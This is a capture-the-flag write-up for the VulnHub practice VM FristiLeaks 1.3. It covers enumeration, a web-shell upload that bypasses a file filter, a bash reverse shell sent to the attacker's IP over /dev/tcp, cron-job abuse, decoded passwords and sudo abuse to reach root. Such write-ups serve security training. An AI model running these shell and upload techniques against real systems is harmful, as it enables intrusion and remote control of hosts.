Vulnhub - FristiLeaks #1.3 Writeup

Description:

Vulnhub - FristiLeaks #1.3 A small VM made for a Dutch informal hacker meetup called Fristileaks. Meant to be broken in a few hours without requiring debuggers, reverse engineering, etc..

Enumeration

Starting off with nmap after adding fristileaks to hosts file.

Nmap

Nmap scan report for fristileaks.com (192.168.29.5)
Host is up, received arp-response (0.00067s latency).
Scanned at 2020-02-16 00:30:56 EST for 12s
Not shown: 999 filtered ports
Reason: 990 no-responses and 9 host-prohibiteds
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
| http-methods: 
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
| http-robots.txt: 3 disallowed entries 
|_/cola /sisi /beer
|_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
MAC Address: 08:00:27:4A:3B:0D (Oracle VirtualBox virtual NIC)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 16 00:31:08 2020 -- 1 IP address (1 host up) scanned in 14.25 seconds

So all we have is a web server on port 80. Checking out the urls in robot.txt just returns a image stating that we are looking at the wrong url. Other enumeration methods turned up empty or useless results.
I was banging my head against the wall looking for any possible attack avenue. In the end I has to go online to look for some hints. Turns out that there is a directory named fristi. How the hell was I supposed to find that?. Mahn I hate this kind of ctf challenges. So anyways lets see whats in there.

We are greeted with a login page. Tried out some sql injection, but it doesn’t seems to vulnerable. Let’s check if there is anything interesting in the source code.

<html>
<head>
<meta name="description" content="super leet password login-test page. We use base64 encoding for images so they are inline in the HTML. I read somewhere on the web, that thats a good way to do it.">
<!-- 
TODO:
We need to clean this up for production. I left some junk in here to make testing easier.

- by eezeepz
-->
</head>
<body>
<center><h1> Welcome to #fristileaks admin portal</h1></center>
<center><img src="data:img/png;base64,/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3k
AAQAEAAAAZAAA/+4ADkFkb2JlAGTAAAAAAf/bAIQAAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQICAgICAgICAgICAwMDAwMDAwMDAwEBAQEBAQECAQECAgIBAgIDAwMDA

------output snipped----------
    
<!-- 
iVBORw0KGgoAAAANSUhEUgAAAW0AAABLCAIAAAA04UHqAAAAAXNSR0IArs4c6QAAAARnQU1BAACx
jwv8YQUAAAAJcEhZcwAADsMAAA7DAcdvqGQAAARSSURBVHhe7dlRdtsgEIVhr8sL8nqymmwmi0kl
S0iAQGY0Nb01//dWSQyTgdxz2t5+AcCHHAHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixw
B4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzkCwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL5kc+f
m63yaP7/XP/5RUM2jx7iMz1ZdqpguZHPl+zJO53b9+1gd/0TL2Wull5+RMpJq5tMTkE1paHlVXJJ
Zv7/d5i6qse0t9rWa6UMsR1+WrORl72DbdWKqZS0tMPqGl8LRhzyWjWkTFDPXFmulC7e81bxnNOvb
DpYzOMN1WqplLS0w+oaXwomXXtfhL8e6W+lrNdDFujoQNJ9XbKtHMpSUmn9BSeGf51bUcr6W+VjNd
jJQjcelwepPCjlLNXFpi8gktXfnVtYSd6UpINdPFCDlyKB3dyPLpSTVzZYnJR7R0WHEiFGv5NrDU
12qmC/1/Zz2ZWXi1abli0aLqjZdq5sqSxUgtWY7syq+u6UpINdOFeI5ENygbTfj+qDbc+QpG9c5
uvFQzV5aM15LlyMrfnrPU12qmC+Ucqd+g6E1JNsX16/i/6BtvvEQzF5YM2JLhyMLz4sNNtp/pSkg1
04VajmwziEdZvmSz9E0YbzbI/FSycgVSzZiXDNmS4cjCni+kLRnqizXThUqOhEkso2k5pGy00aLq
i1n+skSqGfOSIVsKC5Zv4+XH36vQzbl0V0t9rWb6EMyRaLLp+Bbhy31k8SBbjqpUNSHVjHXJmC2Fg
tOH0drysrz404sdLPW1mulDLUdSpdEsk5vf5Gtqg1xnfX88tu/PZy7VjHXJmC21H9lWvBBfdZb6Ws
30oZ0jk3y+pQ9fnEG4lNOco9UnY5dqxrhk0JZKezwdNwqfnv6AOUN9sWb6UMyR5zT2B+lwDh++Fl
3K/U+z2uFJNWNcMmhLzUe2v6n/dAWG+mLN9KGWI9EcKsMJl6o6+ecH8dv0Uu4PnkqDl2rGuiS8HK
ul9iMrFG9gqa/VTB8qORLuSTqF7fYU7tgsn/4+zfhV6aiiIsczlGrGvGTIlsLLhiPbnh6KnLDU12q
mD+0cKQ8nunpVcZ21Rj7erEz0WqoZ+5IRW1oXNB3Z/vBMWulSfYlm+hDLkcIAtuHEUzu/l9l867X34
rPtA6lmLi0ZrqX6gu37aIukRkVaylRfqpk+9HNkH85hNocTKC4P31Vebhd8fy/VzOTCkqeBWlrrFhe
EPdMjO3SSys7XVF+qmT5UcmT9+Ss//fyyOLU3kWoGLd59ZKb6Us10IZMjAP5b5AgAL3IEgBc5AsCLH
AHgRY4A8CJHAHiRIwC8yBEAXuQIAC9yBIAXOQLAixwB4EWOAPAiRwB4kSMAvMgRAF7kCAAvcgSAFzk
CwIscAeBFjgDwIkcAeJEjALzIEQBe5AgAL3IEgBc5AsCLHAHgRY4A8Pn9/QNa7zik1qtycQAAAABJR
U5ErkJggg==
-->
    
------output snipped----------

We have a message by user eezeepz and we have two images encode in base64.(I didn’t you could do that). The second image seems to be commented out. We can use a base64 to png converter to check the contents.

We are presented with a string, which might probably be the password for eezeepz. Login into the admin console using the password keKkeKKeKKeKkEkkEk.

We are greeted with a upload file page, that only allows png,jpg,gif. After trying out various payloads, I found the following.

1. The file has to end with .png to be uploaded
2. The magic byte of the file is irrelevant.

I used simple php backdoor available at /usr/share/webshells/php/simple-backdoor.php, renamed it as s.php.png and uploaded it. Access it from http://fristileaks.com/fristi/uploads/s.php.png?

Low Shell

Run the following command using the php backdoor, to get a bash reverse shell.

fristileaks.com/fristi/uploads/s.php.png?cmd=bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.29.3%2F4444%200%3E%261

Start nc and wait for a connection.

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
connect to [192.168.29.3] from fristileaks.com [192.168.29.5] 43601
bash: no job control in this shell
bash-4.1$ id
id
uid=48(apache) gid=48(apache) groups=48(apache)

Low Shell Enum

There are some interesting files in the home folder /home/eezeepz.

bash-4.1$ cat notes.txt 
cat notes.txt
Yo EZ,

I made it possible for you to do some automated checks, 
but I did only allow you access to /usr/bin/* system binaries. I did
however copy a few extra often needed commands to my 
homedir: chmod, df, cat, echo, ps, grep, egrep so you can use those
from /home/admin/

Don't forget to specify the full path for each binary!

Just put a file called "runthis" in /tmp/, each line one command. The 
output goes to the file "cronresult" in /tmp/. It should 
run every minute with my account privileges.

- Jerry

Looks like a note from a user with higher privilege. We can run a limited set of binary as user admin by copying the command to a text file in /tmp/.
The allowed binaries include chmod, df, cat, echo, ps, grep, egrep. We can change the permission of home directory of admin and see whats in there.

bash-4.1$ echo "/home/admin/chmod 777 /home/admin" > runthis
echo "/home/admin/chmod 777 /home/admin" > runthis
bash-4.1$ ls  
ls
1
cronresult
runthis
bash-4.1$ cat cronresult
cat cronresult
/usr/binexecuting: /home/admin/chmod 777 /home/admin/

Check the permissions on admin home directory.

bash-4.1$ cd /home
cd /home
bash-4.1$ ls -la
ls -la
total 32
drwxr-xr-x.  6 root      root       4096 Feb 16 00:06 .
dr-xr-xr-x. 22 root      root       4096 Feb 15 23:53 ..
drwxrwxrwx.  2 admin     admin      4096 Nov 19  2015 admin
drwx---r-x.  5 eezeepz   eezeepz   12288 Nov 18  2015 eezeepz
drwx------   2 fristigod fristigod  4096 Nov 19  2015 fristigod

Opening the admin directory gives us few interesting files.

bash-4.1$ ls -la
ls -la
total 652
drwxrwxrwx. 2 admin     admin       4096 Nov 19  2015 .
drwxr-xr-x. 6 root      root        4096 Feb 16 00:06 ..
-rw-r--r--. 1 admin     admin         18 Sep 22  2015 .bash_logout
-rw-r--r--. 1 admin     admin        176 Sep 22  2015 .bash_profile
-rw-r--r--. 1 admin     admin        124 Sep 22  2015 .bashrc
-rwxr-xr-x  1 admin     admin      45224 Nov 18  2015 cat
-rwxr-xr-x  1 admin     admin      48712 Nov 18  2015 chmod
-rw-r--r--  1 admin     admin        737 Nov 18  2015 cronjob.py
-rw-r--r--  1 admin     admin         21 Nov 18  2015 cryptedpass.txt
-rw-r--r--  1 admin     admin        258 Nov 18  2015 cryptpass.py
-rwxr-xr-x  1 admin     admin      90544 Nov 18  2015 df
-rwxr-xr-x  1 admin     admin      24136 Nov 18  2015 echo
-rwxr-xr-x  1 admin     admin     163600 Nov 18  2015 egrep
-rwxr-xr-x  1 admin     admin     163600 Nov 18  2015 grep
-rwxr-xr-x  1 admin     admin      85304 Nov 18  2015 ps
-rw-r--r--  1 fristigod fristigod     25 Nov 19  2015 whoisyourgodnow.txt
bash-4.1$ 

1. A file by user fristigod containing the following that looks like a reversed base64 text. Probably the password for fristigod

   bash-4.1$ cat whoisyourgodnow.txt
   cat whoisyourgodnow.txt
   =RFn0AKnlMHMPIzpyuTI0ITG
   

2. A file named cryptedpass.txt that again contains a kind of base64 text.

   cat cryptedpass.txt
   mVGZ3O3omkJLmy2pcuTq
   

3. A python script named cryptpass.py.

   bash-4.1$ cat cryptpass.py
   cat cryptpass.py
   #Enhanced with thanks to Dinesh Singh Sikawar @LinkedIn
   import base64,codecs,sys
   def encodeString(str):
    base64string= base64.b64encode(str)
    return codecs.encode(base64string[::-1], 'rot13')
   cryptoResult=encodeString(sys.argv[1])
   print cryptoResult
   

Okay so look like this python script is used to encrypt the password using rot13 and base64, of fristigod and admin. Lets write a script that will run the algorithm in reverse and decode the password.

Python Decode Script

PS C:\> python
Type "help", "copyright", "credits" or "license" for more information.
>>> import base64
>>> import codecs
>>> def decode(str):
...     rotstr = codecs.decode(str, 'rot13')[::-1]
...     return base64.b64decode(rotstr)
...
>>> decode("mVGZ3O3omkJLmy2pcuTq")
b'thisisalsopw123'
>>> decode("=RFn0AKnlMHMPIzpyuTI0ITG")
b'LetThereBeFristi!'

We have the password of fristigod. Change user to fristigod.

bash-4.1$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
bash-4.1$ su fristigod
su fristigod
Password: LetThereBeFristi!

bash-4.1$ id
id
uid=502(fristigod) gid=502(fristigod) groups=502(fristigod)

Root Shell

After poking around, I found a directory /var/fristigod/.secret_admin_stuff

bash-4.1$ pwd
pwd
/var/fristigod
bash-4.1$ ls -la
ls -la
total 16
drwxr-x---   3 fristigod fristigod 4096 Nov 25  2015 .
drwxr-xr-x. 19 root      root      4096 Nov 19  2015 ..
-rw-------   1 fristigod fristigod 1780 Feb 16 00:09 .bash_history
drwxrwxr-x.  2 fristigod fristigod 4096 Nov 25  2015 .secret_admin_stuff

.bash_history contains the following

bash-4.1$ cat .bash*
cat .bash*
ls
pwd
ls -lah
cd .secret_admin_stuff/
ls
./doCom 
./doCom test
sudo ls
exit
cd .secret_admin_stuff/
ls
./doCom 
sudo -u fristi ./doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom ls /
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
sudo /var/fristigod/.secret_admin_stuff/doCom
exit
sudo /var/fristigod/.secret_admin_stuff/doCom
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom
groups
ls -lah
usermod -G fristigod fristi
exit
sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

Turns out that we can run any command as sudo using the doCom binary. Lets pop a shell using the same binary.

bash-4.1$ ls
ls
doCom
bash-4.1$ sudo -u fristi ./doCom id
sudo -u fristi ./doCom id
[sudo] password for fristigod: LetThereBeFristi!

uid=0(root) gid=100(users) groups=100(users),502(fristigod)


sudo -u fristi ./doCom /bin/sh
sh-4.1# ud
ud
sh: ud: command not found
sh-4.1# id
id
uid=0(root) gid=100(users) groups=100(users),502(fristigod)
sh-4.1# cd /root
cd /root
sh-4.1# ls
ls
1  fristileaks_secrets.txt
sh-4.1# cat fris*
cat fris*
Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]

I wonder if you beat it in the maximum 4 hours it's supposed to take!

Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode)


Flag: Y0u_kn0w_y0u_l0ve_fr1st1


sh-4.1# 

And we are root!